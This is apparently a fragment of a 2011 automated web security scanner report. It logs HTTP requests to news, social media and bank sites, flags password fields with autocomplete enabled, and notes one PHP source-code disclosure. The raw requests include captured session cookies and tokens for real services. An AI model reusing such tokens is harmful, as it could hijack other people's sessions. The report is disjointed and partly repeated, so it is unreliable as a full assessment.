GET /resources/documentation/index.html HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The form contains the following password field with autocomplete enabled:
password
Request
GET /fis/worldnews/worldnews.asp?monthyear=&day=25&id=40221&l=s&special=&ndb=1%20target= HTTP/1.1 Host: fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:54:38 GMT Connection: close Content-Length: 85564 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=BLGBFPGBOBOPPDLCDHNLOLLM; path=/ Cache-control: private
The page contains a form with the following action URL:
http://fis.com/fis/worldnews/worldnews.asp
The form contains the following password field with autocomplete enabled:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:54:33 GMT Connection: close Content-Length: 83533 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
The form contains the following password field with autocomplete enabled:
password
Request
GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:02:54 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <div class="pad5"><form method="post" action="/csp/jap/insidejapan/loginok.csp">
The form contains the following password field with autocomplete enabled:
passwd
Request
GET / HTTP/1.1 Host: ipboard-software.software.informer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Thu, 03 Feb 2011 01:02:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 17619
The page contains a form with the following action URL:
https://www.change.org/login/login
The form contains the following password field with autocomplete enabled:
user[password]
Request
GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi HTTP/1.1 Host: news.change.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field with autocomplete enabled:
password
Request
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password fields with autocomplete enabled:
passwordReg
passwordConfirmationReg
Request
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field with autocomplete enabled:
password
Request
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password fields with autocomplete enabled:
passwordReg
passwordConfirmationReg
Request
GET /article/SB10001424052748703956604576110453371369740.html?KEYWORDS=arbor+networks HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:26 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=7a2f1eb2-978f-44b2-9bd7-93572f6b1271; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:26 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:26 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 15:23:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:41 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=31 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password fields with autocomplete enabled:
passwordReg
passwordConfirmationReg
Request
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL:
https://support01.arbornetworks.com/
The form contains the following password field with autocomplete enabled:
Password
Request
GET / HTTP/1.1 Host: support01.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:00 GMT Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.3 X-Powered-By: PHP/5.2.3 Set-Cookie: PHPSESSID=2eba1bedd93d630fa422ccbd7765c32e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache Pragma: no-cache Content-Length: 1713 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <div class="login_content">
<form name="login" method="post"><!-- Submit Form to Self !--> ...[SNIP]... <td class="align_left"><input name="Password" type="password" value="" size="30" maxlength="16"></td> ...[SNIP]...
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /PracticalMoney HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Wed, 02 Feb 2011 22:02:41 GMT Server: hi Status: 200 OK X-Transaction: 1296684161-47748-46212 ETag: "123020b57eac8841ca216e71073e2ac7" Last-Modified: Wed, 02 Feb 2011 22:02:41 GMT X-Runtime: 0.01070 Content-Type: text/html; charset=utf-8 Content-Length: 50296 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296684161371599; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com Set-Cookie: guest_id=129668416138493212; path=/; expires=Fri, 04 Mar 2011 22:02:41 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCGkZZugtAToHaWQiJTZkMDhhYzVkZmFmMDBh%250AZGI1Y2ZlNjUwMTRjM2U4NmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--ec51ce26345a482a3890029a850bf2fabb529608; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /navyfederalnews HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 22:02:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296684162-28021-53593
ETag: "f8784a8a1866b0cf5f586d1676f574b8"
Last-Modified: Wed, 02 Feb 2011 22:02:42 GMT
X-Runtime: 0.01594
Content-Type: text/html; charset=utf-8
Content-Length: 55640
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296684161892555; path=/; expires=Wed, 09-Feb-11 22:02:41 GMT; domain=.twitter.com
Set-Cookie: guest_id=129668416203448535; path=/; expires=Fri, 04 Mar 2011 22:02:42 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCPYbZugtAToHaWQiJTk2YjVjMzRiODFjOGZk%250AYjYyMDYzN2RiNmZkOGJmZTQ4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--7afe7bcaae311831c57885dd7cd5733609b08898; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
The page contains a form with the following action URL:
https://windlass.navfedcu.org/names.nsf?Login
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1
Host: windlass.navfedcu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 02 Feb 2011 22:03:13 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1390
Cache-control: no-cache
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Server Login</title> <script language="JavaScript" type="text/javascript"> <!-- function doError(){retur ...[SNIP]... <body text="#000000" onLoad="document.forms[0].username.focus(); document.forms[0].username.select();" bgcolor="#FFFFFFFF">
The form contains the following password field with autocomplete enabled:
pass
Request
GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- Need for HL --> <script language="JavaScript"><!--
The page contains a form with the following action URL:
http://www.care2.com/passport/login.html
The form contains the following password field with autocomplete enabled:
password
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <br />
The form contains the following password field with autocomplete enabled:
passwd
Request
GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1
Host: www.enewspf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69019
The form contains the following password field with autocomplete enabled:
pass
Request
GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=41jA_; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 01:06:40 GMT
Content-Length: 11422
The form contains the following password field with autocomplete enabled:
password
Request
GET /fis/worldnews/worldnews.asp?monthyear=&day=25&id=40221&l=e&special=&ndb=1%20target= HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:58 GMT
Connection: close
Content-Length: 84512
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=ANHBFPGBIPJBOMEOPOAIEKOF; path=/
Cache-control: private
The page contains a form with the following action URL:
http://www.fis.com/fis/worldnews/worldnews.asp
The form contains the following password field with autocomplete enabled:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:54 GMT
Connection: close
Content-Length: 83551
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/
Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
The form contains the following password field with autocomplete enabled:
password
Request
GET /fis/worldnews/worldnews.asp?l=e&country=0&special=&monthyear=&day=&id=40138&ndb=1&df=0 HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:58:55 GMT
Connection: close
Content-Length: 85187
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=BNHBFPGBFIEBPIMMLFCBGCMM; path=/
Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Government committs to almadraba for furt ...[SNIP]... <!-- LOGIN --> <form name="member_login">
The page contains a form with the following action URL:
https://www.google.com/accounts/ServiceLoginAuth
The form contains the following password field with autocomplete enabled:
Passwd
Request
GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The page contains a form with the following action URL:
https://www.google.com/accounts/ServiceLoginAuth
The form contains the following password field with autocomplete enabled:
Passwd
Request
GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The form contains the following password field with autocomplete enabled:
LOGIN_password
Request
GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1
Host: www.macaudailytimes.com.mo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The page contains a form with the following action URL:
http://www.sipc.org/claim/module/login.cfm
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1
Host: www.sipc.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:20:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.
The application appears to disclose some server-side source code written in PHP.
Request
GET /pub/shockwave/cabs/director/sw.cab HTTP/1.1
Host: download.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 22 Oct 2010 12:14:09 GMT
ETag: "e6016-25803-94636640"
Accept-Ranges: bytes
Content-Length: 153603
Content-Type: text/plain
Expires: Thu, 03 Feb 2011 01:02:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 01:02:23 GMT
Connection: close